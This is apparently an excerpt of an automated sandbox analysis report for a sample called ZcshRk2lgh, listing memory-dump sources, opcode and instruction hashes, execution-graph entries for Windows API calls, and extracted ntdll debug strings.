                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction ID: ef2d366a5eac9c7adde58e68678e06b15094606663a69fb99f5f67bc660f5fe7
                                                                  • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction Fuzzy Hash: 891103B2404280DFCB16CF54E5C0B16BF72FB84318F24C6A9D8090B697C336D456CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction ID: 9f14eae22da8423aac3df5c47030ce14e42046b2e88a9ff6dbe27b8c05570c4c
                                                                  • Opcode Fuzzy Hash: 0d9143a8ff6c40554208124bd87d7ebbaad978752f52efe449982275cc027c51
                                                                  • Instruction Fuzzy Hash: 561103B2404240DFDB16CF44E5C0B56BF71FB84328F24C6A9D9090B697C33AE456CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                  • Instruction ID: fbb7f179bbd4814ddb4eb7017997a5f6895396fa48c5f2b3b149b0cb860eb521
                                                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                                                  • Instruction Fuzzy Hash: 5311BBB6904680DFCB15CF54E5C0B15FBA1FB88314F24C6A9D8494B696C33AD40ACB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef813e902f90ea8bf20ba1594c8ca4df643f4509ff8c5cd10980cc76058dd9fc
                                                                  • Instruction ID: 441ca46710bbb8c969b8ed4b325db814b9ed457f7c3e0fb3073505db7cb00476
                                                                  • Opcode Fuzzy Hash: ef813e902f90ea8bf20ba1594c8ca4df643f4509ff8c5cd10980cc76058dd9fc
                                                                  • Instruction Fuzzy Hash: 15012B32504384AAF7204F69DD84B66FF9CEF41268F08C59AED090F2C3D2399440CAB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34fd95387d8522b5dc15fc4776dd962e87571294a02a969cb58ff4c480cb7b38
                                                                  • Instruction ID: b24aa98d66daef29079a94d9756e8198a5bf4f33cbaa674dab0099ccb58781c2
                                                                  • Opcode Fuzzy Hash: 34fd95387d8522b5dc15fc4776dd962e87571294a02a969cb58ff4c480cb7b38
                                                                  • Instruction Fuzzy Hash: CCF0C832404340AEE7208E19D884B62FF98EB41634F18C05AED080F2C7C2755840CB71
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHq
                                                                  • API String ID: 0-3820536768
                                                                  • Opcode ID: 39a41163537088208a561eb4834792e42e6b8abedb353d8bf3157b16efa8d403
                                                                  • Instruction ID: dfe0f3b44473a7b02d861fca265c8c052ac77880ff80bc314f87737eddd6172d
                                                                  • Opcode Fuzzy Hash: 39a41163537088208a561eb4834792e42e6b8abedb353d8bf3157b16efa8d403
                                                                  • Instruction Fuzzy Hash: 19728CB0E00219CFCF15DFA8D9846ADBBB1FF84300F1585A5D486BB295D730A992CF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fd70878a480cf67d2a851b8a76305dd35a0bab31663c58f7750f98cc29816f8
                                                                  • Instruction ID: b76b7e77e6a9864e8687c59e1ce10f1633be2d78fe65409bb63c93a2c1be4187
                                                                  • Opcode Fuzzy Hash: 2fd70878a480cf67d2a851b8a76305dd35a0bab31663c58f7750f98cc29816f8
                                                                  • Instruction Fuzzy Hash: 9BE10CB4E002198FDB14DFA9D584AAEFBB2FF89305F248159D854AB395D730AD41CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68e5aacf8fe035e65e01593ab80b0751bf784d8f85d4d7934298d231b1def1fd
                                                                  • Instruction ID: 1593f66befedfa632ceb332e04f7defbdfcc4b959aab3eaf186f760440f3d8e0
                                                                  • Opcode Fuzzy Hash: 68e5aacf8fe035e65e01593ab80b0751bf784d8f85d4d7934298d231b1def1fd
                                                                  • Instruction Fuzzy Hash: F0E1EBB4E002198FDB54DFA9C584AAEFBB2FF89305F248169D814AB359D730AD45CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb9e703fb1fe1996435a42f201064963085f8042fb2baa2e04bba876fa59ab45
                                                                  • Instruction ID: 291d8869e0542551ed6b87114424bc2a886d6e930990d752b76c72646e78863d
                                                                  • Opcode Fuzzy Hash: eb9e703fb1fe1996435a42f201064963085f8042fb2baa2e04bba876fa59ab45
                                                                  • Instruction Fuzzy Hash: 26E1FDB4E002198FDB54DFA9C584AAEFBB2FF89305F248199D814AB355D7309D41CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 42a7d5643bfc3b5d6859ebfa9599fd38d299a3f9a48c55532e0cf535f31eb06f
                                                                  • Instruction ID: bb8f96ec650ff43b85d6235cbeb8aa168c811e96264fbcc71f58a590aefc3668
                                                                  • Opcode Fuzzy Hash: 42a7d5643bfc3b5d6859ebfa9599fd38d299a3f9a48c55532e0cf535f31eb06f
                                                                  • Instruction Fuzzy Hash: 61E1FAB4E002198FDB14DFA9D584AAEFBB2FF49305F248159D854AB399D730AD41CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b561f697a495e118052dbec0d0970bf5729ab9c3c401d46f2afc96612539da03
                                                                  • Instruction ID: ab19f5ea7eecb7195562e072b09ee19c08cca0fb8ea5300206abf81c7e9ea864
                                                                  • Opcode Fuzzy Hash: b561f697a495e118052dbec0d0970bf5729ab9c3c401d46f2afc96612539da03
                                                                  • Instruction Fuzzy Hash: EFA15A32E006258FCF15DFB4C98059EB7B2FF85304B1585AAE906AB265EF31E956CF40

                                                                  Execution Graph

                                                                  Execution Coverage:1.2%
                                                                  Dynamic/Decrypted Code Coverage:4.5%
                                                                  Signature Coverage:8.4%
                                                                  Total number of Nodes:155
                                                                  Total number of Limit Nodes:15

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 222 417a73-417a8f 223 417a97-417a9c 222->223 224 417a92 call 42f553 222->224 225 417aa2-417ab0 call 42fb53 223->225 226 417a9e-417aa1 223->226 224->223 229 417ac0-417ad1 call 42dff3 225->229 230 417ab2-417abd call 42fdf3 225->230 236 417ad3-417ae7 LdrLoadDll 229->236 237 417aea-417aed 229->237 230->229 236->237
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction ID: 3da9ad656e2a33d7f058596d6c0db2f8ecc23348adbfd370e033ddd8e755fe76
                                                                  • Opcode Fuzzy Hash: f7aca7ff22897dbe4d74d0a4087b515c599850f7e07237e5203b5d3da9a5bb0d
                                                                  • Instruction Fuzzy Hash: EC0152B1E0010DBBDF10DAA5DC42FDEB778AF54308F4481A6E90897240F674EB588755

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 248 42c8d3-42c90f call 404663 call 42db03 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C90A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction ID: edcd4929374db9964348cfcf96216c1e7e48739ffbccb93e989d5216367ee6f6
                                                                  • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                  • Instruction Fuzzy Hash: CCE04F752042147BC220EA6ADC41FAB775CDFC6714F108419FA4977241C7757910C7F4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 262 14e2b60-14e2b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                  • Instruction ID: a4175c3bf45c4cc275ece34eeff2e3884f887386091a8f3d066957cdcc2c2f79
                                                                  • Opcode Fuzzy Hash: 30848a622e99c84f414daa2abdf43356d95c5cef2d9e2658dcaec0dcbd28a54d
                                                                  • Instruction Fuzzy Hash: 6F90026160240103450571584414616400AD7F1201B55C026E20149A1DC735C9A56225
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                  • Instruction ID: 3305dd07d73b873dc2e0dd5e19a4ddccff7a46ea07299f00a924cf8dcf54441f
                                                                  • Opcode Fuzzy Hash: 00ab63f9ef8e81966b746e13758ab361d59b5ba028144b38ce8ba2053dde1a37
                                                                  • Instruction Fuzzy Hash: 9390023160140513D511715845047070009D7E1241F95C417A1424969DD766CA66A221

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 263 14e2c70-14e2c7c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                  • Instruction ID: ecd51ec0050181a322ee9f8916a87e5033f5175dd079c565bf67f57234276cb3
                                                                  • Opcode Fuzzy Hash: 68db07dc0413c28bfcd5d67128c8c44dc3fcf7565a39dcd86976cfc812391763
                                                                  • Instruction Fuzzy Hash: 9B90023160148902D5107158840474A0005D7E1301F59C416A5424A69DC7A5C9A57221
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                  • Instruction ID: dbc346b5496f0770e227035629f61bc7b46cf938a7504d01c6d0c8ef29ec9535
                                                                  • Opcode Fuzzy Hash: 1d76cb490cd479af85c2dc59b4abf1ef77b0aab7e5086bfc0fe5cb3614edc206
                                                                  • Instruction Fuzzy Hash: 80900231A0550502D500715845147061005D7E1201F65C416A1424979DC7A5CA6566A2

                                                                  Control-flow Graph

                                                                  control_flow_graph 0 41422d-414237 1 414271-414274 0->1 2 414239-414240 0->2 3 414242-41424c 2->3 4 414289-41429e 2->4 3->1 5 4142a0-4142b8 4->5 6 41431f-414341 4->6 5->6 7 414363-414368 6->7 8 414343-414354 PostThreadMessageW 6->8 8->7 9 414356-414360 8->9 9->7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: +Yf$7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-152878582
                                                                  • Opcode ID: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction ID: c275fd484e462aee15a3afa9325c1543472fcda4a2c72e174b33f2e44c37e21e
                                                                  • Opcode Fuzzy Hash: 8835f3a4d3a980d73cac9d5451b61f837560031cbaac1f6e90a95f3aac6059d8
                                                                  • Instruction Fuzzy Hash: 1B118C71B853576ACB02CEA08C81BDDB7649F92B00F0486EBE9449F6C1D3B58D878795

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(7046-nn1K,00000111,00000000,00000000), ref: 00414350
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 1836367815-59622768
                                                                  • Opcode ID: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction ID: 516b92e160089bb7b3fe599ab1603a73bfc270ec1e4e33151ab2bbf8a00857f9
                                                                  • Opcode Fuzzy Hash: 08cef4079501bae7446cdd3a4563593f3a3346a9b3449423cb903043dd6c050e
                                                                  • Instruction Fuzzy Hash: FA010831E4021876DB20AB919C02FDF7B7C9F80B04F008016FB147B2C0D6BC570687A9

                                                                  Control-flow Graph

                                                                  control_flow_graph 28 414416-414417 29 414419-414428 28->29 30 4143af 28->30 31 4143b1 30->31 32 414365-414368 30->32 33 4143b3-4143c0 31->33 34 414342-414354 PostThreadMessageW 31->34 36 4143c3-4143c6 33->36 37 414363-414364 34->37 38 414356-414360 34->38 39 4143e6-4143ea 36->39 40 4143c8-4143cc 36->40 37->32 38->37 39->36 41 4143ec-4143f0 39->41 40->39 42 4143ce-4143d2 40->42 42->39 43 4143d4-4143d8 42->43 43->39 44 4143da-4143de 43->44 44->39 45 4143e0-4143e4 44->45 45->39 46 4143f1-414401 45->46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7046-nn1K$7046-nn1K
                                                                  • API String ID: 0-59622768
                                                                  • Opcode ID: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                  • Instruction ID: c4b73eb21b230dc31030ab9c1f53721eb1c4f484e884d00b70ebd9f1df3f4591
                                                                  • Opcode Fuzzy Hash: a47dd1c92f441ef4c73ff5499db73bb119073945b9849f7dce625e1cc4a0970a
                                                                  • Instruction Fuzzy Hash: 9701267578E28C2DFF31DA6068C1EE27F089782708F0881DFDD689F283D94A59865355

                                                                  Control-flow Graph

                                                                  control_flow_graph 212 417af3-417b2b 214 417b2c-417b37 212->214 214->214 215 417b39-417b40 214->215 216 417b42 215->216 217 417ac4-417ad1 call 42dff3 215->217 220 417ad3-417ae7 LdrLoadDll 217->220 221 417aea-417aed 217->221 220->221
                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AE5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                  • Instruction ID: 974bac3e534c670f7ac2524caa8da76db0f880a9a0dc8598db73eafaeed0b4e5
                                                                  • Opcode Fuzzy Hash: 8d41206cb82bf2de7a09805619e6fe61e886688f6cc38260023a6cbf9ed9e3a9
                                                                  • Instruction Fuzzy Hash: 5A019C36A0810C7FCF10DAA4DC429EE7B78DF41285F040659D685E7201E632B64F8789

                                                                  Control-flow Graph

                                                                  control_flow_graph 238 42cbf3-42cc37 call 404663 call 42db03 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E80E,?,?,00000000,?,0041E80E,?,?,?), ref: 0042CC32
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction ID: 2846fa4b3233f60a92fef8d27f7aa413956122f50d55b758d752c0d3958e743e
                                                                  • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                  • Instruction Fuzzy Hash: 28E06DB12082097BCA10EE59DC41FAB37ACEFC5714F004419FA08A7241DB74B91087B8

                                                                  Control-flow Graph

                                                                  control_flow_graph 243 42cc43-42cc87 call 404663 call 42db03 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,33F84D8B,00000007,00000000,00000004,00000000,004172DE,000000F4), ref: 0042CC82
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction ID: cc980803f6f00e9c11348fd80cdf1fb29ca32894386c6b15e328b1e50aae6e2f
                                                                  • Opcode Fuzzy Hash: f35c0bb0e5c2be9d201f2d5a3767015d53e8d38ac539a827b4e54993e6d9bddc
                                                                  • Instruction Fuzzy Hash: 80E092B12142087BD610EF59DC41FDB3BACEFC5710F004419FA08A7241D775B9108BB8

                                                                  Control-flow Graph

                                                                  control_flow_graph 253 42cc93-42cccf call 404663 call 42db03 ExitProcess
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,6995A257,?,?,6995A257), ref: 0042CCCA
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_400000_ZcshRk2lgh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                  • Instruction ID: ac3c5cb8458b9ec8aaad2dc6460039598258f1f05cf85b266bad946a97558dfc
                                                                  • Opcode Fuzzy Hash: 67cb749b5959da813ff9cc8226a13492c2e86e24a442318dac2c5c70b4266204
                                                                  • Instruction Fuzzy Hash: 38E086356002147BD110EB6ADC41FD7776CDFC6710F004519FA48A7242C675790187F5

                                                                  Control-flow Graph

                                                                  control_flow_graph 258 14e2c0a-14e2c0f 259 14e2c1f-14e2c26 LdrInitializeThunk 258->259 260 14e2c11-14e2c18 258->260
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                  • Instruction ID: 7627eb4da1eeec7efbf268b741abcc1eeb06c3414949976c7f439cf47671bffd
                                                                  • Opcode Fuzzy Hash: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
                                                                  • Instruction Fuzzy Hash: 37B09B71D015C5C5DE11E764460CB177954B7D1701F15C167D3030653F4778C1E5E275
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                  • Instruction ID: d7302e2a642c7618318dfde74e668421b1043f02cde5208e84bd3a47bbaa8e45
                                                                  • Opcode Fuzzy Hash: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
                                                                  • Instruction Fuzzy Hash: C092C3766083529FE721DF29C880F6BB7E8BB85710F14491EFA94DB2A0D770E844CB52
                                                                  Strings
                                                                  • Invalid debug info address of this critical section, xrefs: 015154B6
                                                                  • double initialized or corrupted critical section, xrefs: 01515508
                                                                  • Critical section debug info address, xrefs: 0151541F, 0151552E
                                                                  • Critical section address., xrefs: 01515502
                                                                  • Thread identifier, xrefs: 0151553A
                                                                  • undeleted critical section in freed memory, xrefs: 0151542B
                                                                  • Address of the debug info found in the active list., xrefs: 015154AE, 015154FA
                                                                  • 8, xrefs: 015152E3
                                                                  • corrupted critical section, xrefs: 015154C2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154CE
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154E2
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01515543
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0151540A, 01515496, 01515519
                                                                  • Critical section address, xrefs: 01515425, 015154BC, 01515534
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1470000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                  • Instruction ID: cbf00edc6d1f5be00919fbfcaea24ce6cd813a275f4c04b1b1da8554aa43631d
                                                                  • Opcode Fuzzy Hash: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
                                                                  • Instruction Fuzzy Hash: 0B81AFB1A40349AFEF21CF99C844FAEBBF5BB49714F60411AF504BB260E3B1A945CB50
                                                                  Strings
